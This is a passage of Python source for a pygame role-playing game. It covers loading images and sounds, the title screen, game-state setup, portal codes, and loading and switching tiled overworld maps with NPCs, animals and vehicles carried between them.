self.fire_images = []\n for i, x in enumerate(FIRE_IMAGES):\n img = pg.image.load(path.join(fire_folder, FIRE_IMAGES[i])).convert_alpha()\n self.fire_images.append(img)\n self.shock_images = []\n for i, x in enumerate(SHOCK_IMAGES):\n img = pg.image.load(path.join(shock_folder, SHOCK_IMAGES[i])).convert_alpha()\n self.shock_images.append(img)\n self.electric_door_images = []\n for i, x in enumerate(ELECTRIC_DOOR_IMAGES):\n img = pg.image.load(path.join(electric_door_folder, ELECTRIC_DOOR_IMAGES[i])).convert_alpha()\n self.electric_door_images.append(img)\n self.loading_screen_images = []\n for i, screen in enumerate(LOADING_SCREEN_IMAGES):\n img = pg.image.load(path.join(loading_screen_folder, LOADING_SCREEN_IMAGES[i])).convert()\n img = pg.transform.scale(img, (self.screen_width, self.screen_height))\n self.loading_screen_images.append(img)\n self.tree_images = {}\n self.breakable_images = {}\n for kind in BREAKABLE_IMAGES:\n temp_list = []\n for i, picture in enumerate(BREAKABLE_IMAGES[kind]):\n img = 
pg.image.load(path.join(breakable_folder, BREAKABLE_IMAGES[kind][i])).convert_alpha()\n temp_list.append(img)\n self.breakable_images[kind] = temp_list\n for kind in TREES:\n temp_list = []\n temp_list2 = []\n temp_list3 = []\n for i, picture in enumerate(TREE_IMAGES[kind]):\n img = pg.image.load(path.join(tree_folder, TREE_IMAGES[kind][i])).convert_alpha()\n scaled_image = pg.transform.scale(img, (TREE_SIZES['small'], TREE_SIZES['small']))\n temp_list.append(scaled_image)\n scaled_image = pg.transform.scale(img, (TREE_SIZES['medium'], TREE_SIZES['medium']))\n temp_list2.append(scaled_image)\n scaled_image = pg.transform.scale(img, (TREE_SIZES['large'], TREE_SIZES['large']))\n temp_list3.append(scaled_image)\n self.tree_images['small ' + kind] = temp_list\n self.tree_images['medium ' + kind] = temp_list2\n self.tree_images['large ' + kind] = temp_list3\n\n self.portal_sheet = pg.image.load(PORTAL_SHEET).convert_alpha()\n self.portal_images = load_spritesheet(self.portal_sheet, 256)\n\n self.fireball_images = []\n for i, x in enumerate(FIREBALL_IMAGES):\n img = pg.image.load(path.join(fireball_folder, FIREBALL_IMAGES[i])).convert_alpha()\n self.fireball_images.append(img)\n self.explosion_images = []\n for i, x in enumerate(EXPLOSION_IMAGES):\n img = pg.image.load(path.join(explosion_folder, EXPLOSION_IMAGES[i])).convert_alpha()\n self.explosion_images.append(img)\n\n self.humanoid_images = {}\n for kind in HUMANOID_IMAGES:\n temp_list = []\n for i, picture in enumerate(HUMANOID_IMAGES[kind]):\n temp_folder = kind.replace('images', 'parts_folder')\n img = pg.image.load(path.join(eval(temp_folder), HUMANOID_IMAGES[kind][i])).convert_alpha()\n temp_list.append(img)\n self.humanoid_images[kind] = temp_list\n\n self.gun_flashes = []\n for img in MUZZLE_FLASHES:\n self.gun_flashes.append(pg.image.load(path.join(img_folder, img)).convert_alpha())\n # lighting effect\n self.fog = pg.Surface((self.screen_width, self.screen_height))\n self.fog.fill(NIGHT_COLOR)\n # Sound loading\n self.effects_sounds = {}\n for key in EFFECTS_SOUNDS:\n self.effects_sounds[key] = pg.mixer.Sound(path.join(snd_folder, EFFECTS_SOUNDS[key]))\n self.weapon_sounds = {}\n for weapon in WEAPON_SOUNDS:\n self.weapon_sounds[weapon] = []\n for snd in WEAPON_SOUNDS[weapon]:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.3)\n self.weapon_sounds[weapon].append(s)\n self.weapon_hit_sounds = {}\n for weapon in WEAPON_HIT_SOUNDS:\n self.weapon_hit_sounds[weapon] = []\n for snd in WEAPON_HIT_SOUNDS[weapon]:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.3)\n self.weapon_hit_sounds[weapon].append(s)\n self.weapon_reload_sounds = {}\n for weapon, snd in WEAPON_RELOAD_SOUNDS.items():\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.3)\n self.weapon_reload_sounds[weapon] = s\n self.zombie_moan_sounds = []\n for snd in ZOMBIE_MOAN_SOUNDS:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.2)\n self.zombie_moan_sounds.append(s)\n self.wraith_sounds = []\n for snd in WRAITH_SOUNDS:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.2)\n self.wraith_sounds.append(s)\n self.punch_sounds = []\n for snd in PUNCH_SOUNDS:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.2)\n self.punch_sounds.append(s)\n self.male_player_hit_sounds = []\n for snd in MALE_PLAYER_HIT_SOUNDS:\n self.male_player_hit_sounds.append(pg.mixer.Sound(path.join(snd_folder, snd)))\n self.female_player_hit_sounds = []\n for snd in FEMALE_PLAYER_HIT_SOUNDS:\n 
self.female_player_hit_sounds.append(pg.mixer.Sound(path.join(snd_folder, snd)))\n self.zombie_hit_sounds = []\n for snd in ZOMBIE_HIT_SOUNDS:\n self.zombie_hit_sounds.append(pg.mixer.Sound(path.join(snd_folder, snd)))\n self.lock_picking_sounds = []\n for snd in LOCK_PICKING_SOUNDS:\n self.lock_picking_sounds.append(pg.mixer.Sound(path.join(snd_folder, snd)))\n\n def new(self):\n pg.mixer.music.load(path.join(music_folder, TITLE_MUSIC))\n pg.mixer.music.play(loops=-1)\n title_image = pg.image.load(path.join(img_folder, TITLE_IMAGE)).convert()\n title_image = pg.transform.scale(title_image, (self.screen_width, self.screen_height))\n self.map = None\n self.continued_game = False\n waiting = True\n i = 0\n while waiting:\n self.clock.tick(FPS)\n self.screen.fill(BLACK)\n title_image.set_alpha(i)\n self.screen.blit(title_image, (0, 0))\n if i > 240:\n self.draw_text('Press any key to start your adventure.', self.script_font, 18, WHITE, self.screen_width / 2, int(self.screen_height * 0.85),\n align=\"center\")\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n sys.exit()\n if event.type == pg.MOUSEBUTTONDOWN:\n waiting = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_n: # Enters the NPC creation tool\n if event.mod & pg.KMOD_CTRL:\n pass # I removed this but will add it again later.\n else:\n waiting = False\n\n elif event.key != pg.K_n:\n if not event.mod & pg.KMOD_CTRL:\n waiting = False\n\n pg.display.flip()\n i += 1\n if i > 255:\n i = 255\n\n # initialize all variables and do all the setup for a new game\n\n # Used for controlling day and night\n self.darkness = 0\n self.dark_color = (255, 255, 255)\n self.time_of_day = 0\n self.nightfall = False\n self.sunrise = False\n self.night = False\n self.last_darkness_change = 0\n self.day_start_time = pg.time.get_ticks()\n\n self.map_sprite_data_list = []\n self._player_inside = False\n self.compass_rot = 0\n self.people = PEOPLE\n self.animals_dict = ANIMALS\n self.saved_vehicle = []\n self.saved_companions = []\n self.underworld = False\n self.quests = QUESTS\n self.key_map = KEY_MAP\n self.bg_music = BG_MUSIC\n self.previous_music = TITLE_MUSIC\n self.portal_location = vec(0, 0)\n self.portal_combo = ''\n self.guard_alerted = False\n self.hud_map = False\n self.hud_overmap = False\n\n self.message_text = True\n self.message = ''\n self.map_type = None\n self.ais = []\n self.group = PyscrollGroup(0) # 0 is the map base layer, but I set it later to self.map.map_layer.\n self.all_sprites = pg.sprite.LayeredUpdates() # Used for all non_static sprites\n self.all_static_sprites = pg.sprite.Group() # used for all static sprites\n self.inventory_hud_icons = pg.sprite.Group()\n self.sprites_on_screen = pg.sprite.Group()\n self.moving_targets = pg.sprite.Group() # Used for all moving things bullets interact with\n self.moving_targets_on_screen = pg.sprite.Group()\n self.mobs = pg.sprite.Group()\n self.mobs_on_screen = pg.sprite.Group()\n self.npc_bodies = pg.sprite.Group()\n self.npc_bodies_on_screen = pg.sprite.Group()\n self.npcs = pg.sprite.Group()\n self.npcs_on_screen = pg.sprite.Group()\n self.animals = pg.sprite.Group()\n self.animals_on_screen = pg.sprite.Group()\n self.fires = pg.sprite.Group()\n self.fires_on_screen = pg.sprite.Group()\n self.breakable = pg.sprite.Group()\n self.breakable_on_screen = pg.sprite.Group()\n self.corpses = pg.sprite.Group()\n self.corpses_on_screen = pg.sprite.Group()\n self.dropped_items = pg.sprite.Group()\n self.dropped_items_on_screen = pg.sprite.Group()\n self.obstacles = 
pg.sprite.Group()\n self.obstacles_on_screen = pg.sprite.Group()\n self.walls = pg.sprite.Group()\n self.walls_on_screen = pg.sprite.Group()\n self.barriers = pg.sprite.Group()\n self.barriers_on_screen = pg.sprite.Group()\n self.elevations = pg.sprite.Group()\n self.elevations_on_screen = pg.sprite.Group()\n self.inside = pg.sprite.Group()\n self.inside_on_screen = pg.sprite.Group()\n self.climbs = pg.sprite.Group()\n self.climbs_on_screen = pg.sprite.Group()\n self.vehicles = pg.sprite.Group()\n self.vehicles_on_screen = pg.sprite.Group()\n self.lights = pg.sprite.Group()\n self.lights_on_screen = pg.sprite.Group()\n\n self.aipaths = pg.sprite.Group()\n self.firepots = pg.sprite.Group()\n self.arrows = pg.sprite.Group()\n self.chargers = pg.sprite.Group()\n self.mechsuits = pg.sprite.Group()\n self.detectors = pg.sprite.Group()\n self.detectables = pg.sprite.Group()\n self.portals = pg.sprite.Group()\n self.door_walls = pg.sprite.Group()\n self.nospawn = pg.sprite.Group()\n self.doors = pg.sprite.Group()\n self.player_group = pg.sprite.Group()\n self.players = pg.sprite.Group()\n self.grabable_animals = pg.sprite.Group()\n self.explosions = pg.sprite.Group()\n self.shocks = pg.sprite.Group()\n self.fireballs = pg.sprite.Group()\n self.firepits = pg.sprite.Group()\n self.containers = pg.sprite.Group()\n self.bullets = pg.sprite.Group()\n self.enemy_bullets = pg.sprite.Group()\n self.enemy_fireballs = pg.sprite.Group()\n self.work_stations = pg.sprite.Group()\n self.climbables_and_jumpables = pg.sprite.Group()\n self.all_vehicles = pg.sprite.Group()\n self.companions = pg.sprite.Group()\n self.companion_bodies = pg.sprite.Group()\n self.boats = pg.sprite.Group()\n self.amphibious_vehicles = pg.sprite.Group()\n self.flying_vehicles = pg.sprite.Group()\n self.land_vehicles = pg.sprite.Group()\n self.turrets = pg.sprite.Group()\n self.occupied_vehicles = pg.sprite.Group()\n self.random_targets = pg.sprite.Group()\n self.clicked_sprites = []\n self.target_list = [self.random_targets, self.moving_targets, self.aipaths]\n self.new_game = True\n self.respawn = False\n self.previous_map = \"1.tmx\"\n self.world_location = vec(1, 1)\n self.underworld_sprite_data_dict = {}\n self.player = Player(self) # Creates initial player object\n self.continued_game = False\n if self.new_game: # Why do I have two variables, new_game and continued_game?\n self.character_menu = MainMenu(self, self.player, 'Character')\n if not self.continued_game:\n self.overworld_map = START_WORLD\n self.load_over_map(self.overworld_map) # Loads world map for first world. This will allow me to load other world maps later.
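\n # The RACE table itself is defined outside this excerpt; from the call below it is assumed to map each race to at least a 'start map' tmx file and a 'start pos' tile coordinate. A purely hypothetical entry, for illustration only:\n # RACE = {'human': {'start map': '1.tmx', 'start pos': (10, 14)}}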
\n self.change_map(None, RACE[self.player.equipped['race']]['start map'], RACE[self.player.equipped['race']]['start pos'])\n self.fly_menu = None\n self.in_menu = False\n self.in_lock_menu = False\n self.in_dialogue_menu = False\n self.dialogue_menu = None\n self.dialogue_menu_npc = None\n self.last_hud_update = 0\n self.last_fire = 0\n self.last_dialogue = 0\n self.hud_health_stats = self.player.stats\n self.hud_health = self.hud_health_stats['health'] / self.hud_health_stats['max health']\n self.hud_stamina = self.hud_health_stats['stamina'] / self.hud_health_stats['max stamina']\n self.hud_magica = self.hud_health_stats['magica'] / self.hud_health_stats['max magica']\n self.hud_mobhp = 0\n self.selected_hud_item = None\n self.show_mobhp = False\n self.last_mobhp_update = 0\n self.hud_hunger = 1\n self.hud_ammo1 = ''\n self.hud_ammo2 = ''\n self.draw_debug = False\n self.paused = False\n self.effects_sounds['level_start'].play()\n\n @property\n def portal_combo(self): # This is the method that is called whenever you access portal_combo\n return self._portal_combo\n @portal_combo.setter # Runs whenever you set a value for portal_combo; it checks portal combos\n def portal_combo(self, value):\n self._portal_combo = value\n if value != '':\n if value in PORTAL_CODES:\n coordinate = vec(PORTAL_CODES[value][0], PORTAL_CODES[value][1])\n location = vec(PORTAL_CODES[value][2], PORTAL_CODES[value][3])\n self.portal_combo = ''\n Portal(self, self.portal_location, coordinate, location)\n @property\n def player_inside(self): # This is the method that is called whenever you access player_inside\n return self._player_inside\n @player_inside.setter # This is the method that is called whenever you set a value\n def player_inside(self, value):\n if value != self._player_inside:\n self._player_inside = value\n self.map.toggle_visible_layers()\n\n def load_over_map(self, overmap):\n # Loads data from overworld tmx file\n with open(path.join(map_folder, overmap), \"r\") as file:\n map_data = file.readlines()\n self.overworld_map = overmap\n self.map_data_list = []\n for row in map_data:\n if '<' not in row: # Ignores all tags in tmx file\n row = row.replace(',\\n', '') # gets rid of commas at the end\n row = row.replace(' ', '') # gets rid of spaces between entries\n row = row.replace('\\n', '') # gets rid of new lines\n row = row.split(',')\n row = list(map(int, row)) # Converts the list of strings to integers\n self.map_data_list.append(row)\n self.world_width = len(self.map_data_list[0])\n self.world_height = len(self.map_data_list)\n\n # This creates a map data object to store which sprites are on each map. This keeps track of where sprites are when they move around or when you drop things.\n if self.map_sprite_data_list == []:\n for x in range(0, self.world_width):\n row = []\n for y in range(0, self.world_height):\n row.append(None)\n self.map_sprite_data_list.append(row)\n\n #world_mini_map = WorldMiniMap(self, self.map_data_list) # Only uncomment this to create a new overworld map if you edit the old one. 
Otherwise it will take literally forever to load every time.\n #self.load_map(str(self.map_data_list[int(self.world_location.y)][int(self.world_location.x)]) + '.tmx')\n\n \"\"\"\n def in_surrounding_tiles(self, x, y, num, layer):\n if (x < self.map.tiles_wide-1) and (y < self.map.tiles_high-1):\n if 0 not in [x, y]:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y - 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x + 1, y - 1, layer)]\n elif x == 0 and y != 0:\n return num in [self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer), self.map.tmxdata.get_tile_gid(x + 1, y - 1, layer)]\n elif x != 0 and y == 0:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y + 1, layer)]\n else:\n return num in [self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer)]\n elif (x == self.map.tiles_wide-1) and (y == self.map.tiles_high-1):\n if 0 not in [x, y]:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x - 1, y - 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer)]\n elif x == 0 and y != 0:\n return num in [self.map.tmxdata.get_tile_gid(x, y - 1, layer)]\n elif x != 0 and y == 0:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer)]\n elif (x == self.map.tiles_wide-1) and (y != self.map.tiles_high-1):\n if 0 not in [x, y]:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x - 1, y - 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y + 1, layer)]\n elif x == 0 and y != 0:\n return num in [self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer)]\n elif x != 0 and y == 0:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y + 1, layer)]\n else:\n return num in [self.map.tmxdata.get_tile_gid(x, y + 1, layer)]\n elif (x != self.map.tiles_wide-1) and (y == self.map.tiles_high-1):\n if 0 not in [x, y]:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x - 1, y - 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer),\n self.map.tmxdata.get_tile_gid(x + 1, y - 1, layer)]\n elif x == 0 and y != 0:\n return num in [self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer), self.map.tmxdata.get_tile_gid(x + 1, y - 1, layer)]\n elif x != 0 and y == 0:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y, layer)]\n else:\n return num in [self.map.tmxdata.get_tile_gid(x + 1, y, layer)]\"\"\"\n\n def on_map(self, sprite):\n offset = 0\n if sprite['location'].x <= 0:\n 
sprite['location'].x = self.map.width - offset\n return [False, -1, 0]\n if sprite['location'].y <= 0:\n sprite['location'].y = self.map.height - offset\n return [False, 0, -1]\n if sprite['location'].x >= self.map.width:\n sprite['location'].x = offset\n return [False, 1, 0]\n if sprite['location'].y >= self.map.height:\n sprite['location'].y = offset\n return [False, 0, 1]\n return [True, 0, 0]\n\n # Used for switching to the next map after you go north, south, east or west at the end of the current map.\n def change_map(self, cardinal=None, coordinate=None, location=None, undermap=None):\n self.save_sprite_locs()\n # This for loop moves npcs and animals to other maps when they go off the screen.\n if not self.underworld and self.map:\n for npc in list(self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].npcs): # Iterates over a copy because entries are removed below.\n temp_loc = self.on_map(npc)\n if not temp_loc[0]:\n if self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].visited:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].npcs.append(npc)\n else:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].moved_npcs.append(npc)\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].npcs.remove(npc)\n for animal in list(self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].animals): # Iterates over a copy because entries are removed below.\n temp_loc = self.on_map(animal)\n if not temp_loc[0]:\n if self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].visited:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].animals.append(animal)\n else:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].moved_animals.append(animal)\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].animals.remove(animal)\n for vehicle in list(self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].vehicles): # Iterates over a copy because entries are removed below.\n temp_loc = self.on_map(vehicle)\n if not temp_loc[0]:\n if self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].visited:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].vehicles.append(vehicle)\n else:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].moved_vehicles.append(vehicle)\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].vehicles.remove(vehicle)\n\n self.guard_alerted = False # Makes it so guards stop attacking you after you change maps\n self.player.vel = vec(0, 0)\n self.player.acc = vec(0, 0)\n direction = cardinal\n offset = 64\n if cardinal:\n if direction == 'north':\n self.world_location -= vec(0, 1)\n self.player.rect.top = self.map.height - offset\n self.player.pos = vec(self.player.rect.center)\n elif direction == 'south':\n self.world_location += vec(0, 1)\n self.player.rect.bottom = offset\n self.player.pos = vec(self.player.rect.center)\n elif direction == 'east':\n self.world_location += vec(1, 0)\n self.player.rect.right = offset\n self.player.pos = vec(self.player.rect.center)\n elif direction == 'west':\n self.world_location -= vec(1, 0)\n self.player.rect.left = self.map.width - offset\n 
self.player.pos = vec(self.player.rect.center)\n # This part of the code wraps around creating a globe like world\n if self.world_location.x == self.world_width:\n self.world_location.x = 0\n if self.world_location.x < 0:\n self.world_location.x = self.world_width - 1\n if self.world_location.y == self.world_height:\n self.world_location.y = 0\n if self.world_location.y < 0:\n self.world_location.y = self.world_height - 1\n\n if coordinate:\n # Sets player's location of world map\n self.world_location = vec(coordinate)\n # Sets player's location on local map\n loc = vec(location)\n self.player.rect.center = (int(loc.x * TILESIZE), int(loc.y * TILESIZE))\n self.player.pos = vec(self.player.rect.center)\n if undermap == None:\n selected_map = str(self.map_data_list[int(self.world_location.y)][int(self.world_location.x)] - 1) + '.tmx'\n else:\n selected_map = undermap\n\n # This block of code sets the positions of the player's followers so they are randomly arranged in a circular orientation around the player.\n for companion in self.companions:\n rand_angle = randrange(0, 360)\n random_vec = vec(170, 0).rotate(-rand_angle)\n companion.rect.center = self.player.rect.center + random_vec\n companion.pos = vec(companion.rect.center)\n companion.offensive = False\n companion.map = selected_map\n self.load_map(selected_map)\n\n def make_work_station_menu(self, station_type, inventory):\n station = WORK_STATION_DICT[station_type]\n MainMenu(self, self.player, station, inventory)\n\n def make_lock_menu(self, lock):\n self.lock_menu = Lock_Menu(self, lock)\n\n def sleep_in_bed(self):\n self.screen.fill(BLACK)\n pg.mixer.music.stop()\n self.draw_text('Sweet dreams....', self.script_font, 25, WHITE, self.screen_width / 2, self.screen_height / 2, align=\"topright\")\n pg.display.flip()\n self.player.add_health(50)\n self.player.add_stamina(50)\n self.player.add_magica(50)\n self.effects_sounds['snore'].play()\n sleep(10)\n self.beg = perf_counter() # resets dt\n pg.mixer.music.play(loops=-1)\n # Changes it to sunrise when you sleep.\n self.darkness = 225\n color_val = 255 - self.darkness\n self.dark_color = (color_val, color_val, color_val)\n self.night = True\n self.day_start_time = pg.time.get_ticks() - NIGHT_LENGTH\n\n def garbage_collect(self): # This block of code removes everything in memory from previous maps\n for sprite in self.all_sprites:\n if self.player.possessing:\n if sprite in [self.player.possessing, self.player.possessing.body]:\n continue\n if self.player.in_vehicle:\n if sprite in [self.player.vehicle]:\n continue\n if sprite in self.companions:\n continue\n elif sprite in self.companion_bodies:\n continue\n elif sprite in [self.player, self.player.human_body, self.player.dragon_body, self.player.body]:\n continue\n else:\n sprite.kill()\n del sprite\n for sprite in self.turrets:\n if not sprite.mother.alive():\n sprite.kill()\n del sprite\n\n for sprite in self.all_static_sprites:\n sprite.kill()\n del sprite\n\n del self.map\n gc.collect() # Forces garbage collection. 
Without this the game will quickly run out of memory.\n\n def layer_num_by_name(self, name):\n for i, layer in enumerate(self.map.tmxdata.visible_layers):\n if isinstance(layer, pytmx.TiledTileLayer):\n if layer.name == name:\n return i\n return None\n\n def load_map(self, temp_map):\n #self.sprite_data = self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)]\n self.compass_rot = -math.atan2(49 - self.world_location.y, 89 - self.world_location.x)\n self.compass_rot = math.degrees(self.compass_rot)\n map_number = self.map_data_list[int(self.world_location.y)][int(self.world_location.x)]\n self.minimap_image = pg.image.load(path.join(map_folder, str(map_number - 1) + '.png')).convert()\n\n # Checks to see if the map is below the main world level\n current_map = temp_map\n self.underworld = False\n\n self.map_type = None\n self.screen.fill(BLACK)\n loading_screen = choice(self.loading_screen_images)\n self.screen.blit(loading_screen, (0, 0))\n self.draw_text('Loading....', self.script_font, 35, WHITE, self.screen_width / 4, self.screen_height * 3/4, align=\"topright\")\n pg.display.flip()\n if not self.new_game:\n self.garbage_collect()\n self.map = TiledMap(self, current_map)\n if not self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)]: # Stores the stored map data object so it can be accessed from any map even after the map object dies.\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)] = self.map.stored_map_data\n self.sprite_data = self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)]\n self.group = PyscrollGroup(self.map.map_layer)\n self.group.add(self.player)\n self.group.add(self.player.human_body)\n self.group.add(self.player.dragon_body)\n #self.group.change_layer(self.player, self.original_layer)\n #self.group._map_layer = self.map.map_layer # Sets the map as the Pyscroll group base layer.\n self.camera = Camera(self, self.map.width, self.map.height)\n\n # This block of code is supposed to save edited tile maps, but it's all gooped up.\n #if self.sprite_data.tiledata:\n # for i, layer in enumerate(self.map.tmxdata.layers):\n # if isinstance(layer, pytmx.TiledTileLayer): # Excludes object layers\n # self.map.tmxdata.layers[i].data = self.sprite_data.tiledata[i]\n #else:\n # self.sprite_data.tiledata = []\n # for i, layer in enumerate(self.map.tmxdata.layers):\n # if isinstance(layer, pytmx.TiledTileLayer): # Excludes object layers\n # self.sprite_data.tiledata.append(self.map.tmxdata.layers[i].data)\n\n for i in range(0, 10): # Creates random targets for NPCs\n target = Target(self)\n hits = pg.sprite.spritecollide(target, self.walls, False) # Kills targets that appear in walls.\n if hits:\n target.kill()\n\n if self.sprite_data.visited: # Loads stored map data for sprites if you have visited before.\n companion_names = []\n for companion in self.companions:\n companion_names.append(companion.kind)\n for npc in self.sprite_data.npcs:\n if npc['name'] not in companion_names: # Makes it so it doesn't double load your companions.\n Player(self, npc['location'].x, npc['location'].y, npc['name'])\n for animal in self.sprite_data.animals:\n Animal(self, animal['location'].x, animal['location'].y, animal['name'])\n for vehicle in self.sprite_data.vehicles:\n Vehicle(self, vehicle['location'], vehicle['name'])\n #for breakable in self.sprite_data.breakable:\n # Breakable(self, breakable['location'], breakable['w'], breakable['h'], breakable['name'], breakable['rotation'])\n for item in 
self.sprite_data.items:\n if item['name'] in ITEMS:\n Dropped_Item(self, item['location'], ITEMS[item['name']], item['rotation'])\n else: # Loads animals and NPCs that have moved onto unvisited maps.\n companion_names = []\n for companion in self.companions:\n companion_names.append(companion.kind)\n for npc in self.sprite_data.moved_npcs:\n if npc['name'] not in companion_names: # Makes it so it doesn't double load your companions.\n Player(self, npc['location'].x, npc['location'].y, npc['name'])\n self.sprite_data.moved_npcs = []\n for animal in self.sprite_data.moved_animals:\n Animal(self, animal['location'].x, animal['location'].y, animal['name'])\n self.sprite_data.moved_animals = []\n\n # Creates elevation objects if layers have EL in their names. I realize this is inefficient, and hopefully I can find a way to minimize the number of elevation objects created.\n for i, layer in enumerate(self.map.tmxdata.visible_layers):\n if 'EL' in layer.name:\n EL = layer.name\n EL = EL.replace('EL', '')\n EL = int(EL)\n if isinstance(layer, pytmx.TiledTileLayer):\n for x, y, gid, in layer:\n if gid != 0:\n cliff = self.in_surrounding_tiles(x, y, 0, i)\n elev = Elevation(self, x * self.map.tile_size, y * self.map.tile_size, self.map.tile_size, self.map.tile_size, EL, cliff)\n hits = pg.sprite.spritecollide(elev, self.elevations, False) # Kills redundant elevations on top of others.\n for hit in hits:\n if hit != elev:\n hit.kill()\n\n # Creates wall and ore block objects if layers have WALLS in their names.\n #exception_tile = 0\n #experimenting with changing tiles\n #print(self.map.tmxdata.tiledgidmap)\n #layer = self.map.tmxdata.layers[2].data\n #layer[0][0] = 2\n \"\"\"\n if self.map.tmxdata.get_tile_gid(0, 0, 0) != self.map.tmxdata.get_tile_gid(0, 1, 0): # Sees if there is a different tile in the upper left corner to use as a zero tile where no walls will spawn.\n exception_tile = self.map.tmxdata.get_tile_gid(0, 0, 0) # Tile type to ignore and treat as a zero.\n if self.map.tmxdata.get_tile_gid(1, 0, 0) != self.map.tmxdata.get_tile_gid(0, 1, 0): # Sees if there is a different tile in the upper corner (2nd x pos) to use as an ore tile.\n block_tile = self.map.tmxdata.get_tile_gid(1, 0, 0)\n for i, layer in enumerate(self.map.tmxdata.visible_layers):\n if 'WALLS' in layer.name:\n if isinstance(layer, pytmx.TiledTileLayer):\n for x, y, gid, in layer:\n if gid != 0:\n if gid == block_tile: # Makes ore block objects where the block_tile type tile is.\n if not self.sprite_data.visited: # Only generates ores if you haven't been here before. 
Otherwise it generates the remaining ores from the map data object.\n block_type = choice(choices(BLOCK_LIST, BLOCK_PROB, k=10))\n center = vec(x * self.map.tile_size + self.map.tile_size / 2, y * self.map.tile_size + self.map.tile_size / 2)\n Breakable(self, center, self.map.tile_size, self.map.tile_size, block_type)\n elif self.in_surrounding_tiles(x, y, 0, i):#Checks to see if surrounding tiles are zeros and spawns a wall if they are.\n wall = Obstacle(self, x * self.map.tile_size, y * self.map.tile_size, self.map.tile_size, self.map.tile_size)\n hits = pg.sprite.spritecollide(wall, self.walls, False) # Kills redundant walls on top of others.\n for hit in hits:\n if hit != wall:\n hit.kill()\n elif (gid != exception_tile) and self.in_surrounding_tiles(x, y, exception_tile, i):#Checks to see if surrounding tiles are exceptions and spawns a wall if they are.\n wall = Obstacle(self, x * self.map.tile_size, y * self.map.tile_size, self.map.tile_size, self.map.tile_size)\n hits = pg.sprite.spritecollide(wall, self.walls, False) # Kills redundant walls on top of others.\n for hit in hits:\n if hit != wall:\n hit.kill()\n \"\"\"\n\n # This section creates ores based off of which tile is used in the map rather than having to create ore objects\n #if self.map_type:\n # for type in UNDERWORLD:\n # if type in self.map_type:\n # # This section generates ore blocks to time in all the spaces with the tile specified in the position (0, 0).\n # if not self.sprite_data.visited:\n # block_tile = self.map.tmxdata.get_tile_gid(1, 0, 0)\n # for location in 